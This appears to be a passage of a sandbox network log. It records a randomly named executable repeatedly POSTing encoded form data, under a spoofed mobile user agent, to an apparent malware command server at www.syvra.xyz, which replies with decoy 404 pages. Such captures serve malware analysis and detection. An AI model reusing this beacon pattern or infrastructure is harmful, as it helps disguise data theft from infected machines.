                      Sep 13, 2024 12:27:49.681596041 CEST | 733 | OUT | POST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 35 47 68 77 38 57 34 4d 35 6a 56 4b 68 34 74 76 69 6f 69 6f 70 4f 39 43 7a 4f 73 53 5a 42 78 71 4f 72 79 63 47 4d 69 59 31 42 31 64 30 30 49 36 48 66 56 4b 68 30 37 4c 79 67 75 79 4a 56 4d 78 6a 61 64 75 61 78 65 79 73 6c 43 6a 56 73 43 7a 77 61 76 4f 55 33 31 78 69 4d 33 72 6b 73 41 32 59 48 70 68 66 77 39 64 53 46 77 51 70 7a 31 62 72 54 6f 63 53 36 54 51 58 6f 39 51 57 5a 33 68 6d 48 55 4c 47 44 54 73 49 77 42 47 70 71 6a 47 73 65 38 66 5a 36 63 78 68 42 34 4b 4f 70 4e 47 58 30 55 70 58 2f 76 53 6f 6e 68 4d 39 48 2f 73 4d 66 6e 2b 4d 77 3d 3d
                      Data Ascii: MtXH8dRH=nLi3hk6LsWGq5Ghw8W4M5jVKh4tvioiopO9CzOsSZBxqOrycGMiY1B1d00I6HfVKh07LyguyJVMxjaduaxeyslCjVsCzwavOU31xiM3rksA2YHphfw9dSFwQpz1brTocS6TQXo9QWZ3hmHULGDTsIwBGpqjGse8fZ6cxhB4KOpNGX0UpX/vSonhM9H/sMfn+Mw==
                      Sep 13, 2024 12:27:50.249691963 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:50 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:50.249742031 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                      Sep 13, 2024 12:27:50.249793053 CEST | 448 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                      Sep 13, 2024 12:27:50.249829054 CEST | 1236 | IN | Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                      Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                      Sep 13, 2024 12:27:50.249861956 CEST | 1236 | IN | Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                      Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                      Sep 13, 2024 12:27:50.249897003 CEST | 448 | IN | Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                      Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                      Sep 13, 2024 12:27:50.249969959 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                      Sep 13, 2024 12:27:50.250005007 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                      Sep 13, 2024 12:27:50.250052929 CEST | 1236 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                      Sep 13, 2024 12:27:50.250144005 CEST | 672 | IN | Data Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20
                      Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
                      Sep 13, 2024 12:27:50.255011082 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.4 | 50407 | 162.0.213.94 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:52.324922085 CEST | 753 | OUT | POST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 33 42 71 50 4f 57 63 48 4a 4f 59 32 42 31 64 73 6b 49 2f 4a 2f 55 6e 68 30 32 2b 79 68 53 79 4a 56 49 78 6a 66 68 75 61 43 6d 78 74 31 43 39 5a 4d 43 39 2f 36 76 4f 55 33 31 78 69 4d 7a 42 6b 71 6f 32 59 58 5a 68 65 52 39 63 54 46 77 66 6a 54 31 62 68 44 6f 51 53 36 54 49 58 70 68 36 57 63 72 68 6d 47 6b 4c 47 33 48 74 42 77 41 50 6b 4b 69 45 67 65 5a 68 66 37 74 61 6b 7a 55 5a 48 4b 59 72 66 53 46 7a 47 4f 4f 46 36 6e 46 2f 67 41 32 59 42 63 61 33 58 78 4f 38 49 52 44 69 39 50 4c 54 72 78 31 66 41 46 6b 77 62 76 4d 3d
                      Data Ascii: MtXH8dRH=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za3BqPOWcHJOY2B1dskI/J/Unh02+yhSyJVIxjfhuaCmxt1C9ZMC9/6vOU31xiMzBkqo2YXZheR9cTFwfjT1bhDoQS6TIXph6WcrhmGkLG3HtBwAPkKiEgeZhf7takzUZHKYrfSFzGOOF6nF/gA2YBca3XxO8IRDi9PLTrx1fAFkwbvM=
                      Sep 13, 2024 12:27:52.895612955 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:52 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:52.895661116 CEST | 224 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                      Sep 13, 2024 12:27:52.895693064 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                      Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                      Sep 13, 2024 12:27:52.895742893 CEST | 1236 | IN | Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                      Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                      Sep 13, 2024 12:27:52.895792961 CEST | 1236 | IN | Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                      Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                      Sep 13, 2024 12:27:52.895831108 CEST | 1236 | IN | Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                      Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                      Sep 13, 2024 12:27:52.895844936 CEST | 1236 | IN | Data Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c
                      Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
                      Sep 13, 2024 12:27:52.895876884 CEST | 552 | IN | Data Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32
                      Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
                      Sep 13, 2024 12:27:52.895916939 CEST | 1236 | IN | Data Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                      Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                      Sep 13, 2024 12:27:52.895946026 CEST | 224 | IN | Data Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                      Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
                      Sep 13, 2024 12:27:52.901026964 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                      Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.4 | 50408 | 162.0.213.94 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:54.873523951 CEST | 10835 | OUT | POST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 30 68 71 50 34 61 63 42 75 36 59 35 68 31 64 79 30 49 2b 4a 2f 55 66 68 30 76 32 79 68 66 50 4a 57 67 78 69 35 56 75 4e 6a 6d 78 30 46 43 39 45 38 43 77 77 61 75 4d 55 33 6c 39 69 4d 6a 42 6b 71 6f 32 59 52 31 68 58 67 39 63 52 46 77 51 70 7a 31 70 72 54 70 50 53 37 33 59 58 70 6c 41 57 6f 6e 68 6d 6d 30 4c 45 6b 76 74 4b 77 41 4e 6c 4b 69 6d 67 65 6c 45 66 2f 31 38 6b 33 55 33 48 4c 67 72 64 6a 41 74 66 64 2b 47 74 55 4e 68 38 42 47 61 4e 62 32 74 49 6a 47 64 42 54 6e 65 68 66 54 71 78 52 45 39 58 45 74 71 43 62 49 75 34 49 70 36 71 68 35 35 6f 41 6d 44 50 79 2f 44 44 78 53 57 36 44 46 72 6c 52 38 79 53 34 32 62 42 39 70 55 33 66 61 57 74 44 2b 49 51 64 75 42 61 4f 6d 6f 77 43 6f 57 71 41 6c 44 68 74 51 5a 54 58 41 4f 76 56 52 61 45 49 41 58 50 31 36 44 49 48 38 47 68 74 4c 4b 44 71 37 61 39 6c 63 56 63 37 4b 6e 35 36 49 4e 78 58 68 61 73 33 4e 61 55 [TRUNCATED]
                      Data Ascii: MtXH8dRH=[TRUNCATED]
                      Sep 13, 2024 12:27:55.565969944 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:55 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:55.566030025 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
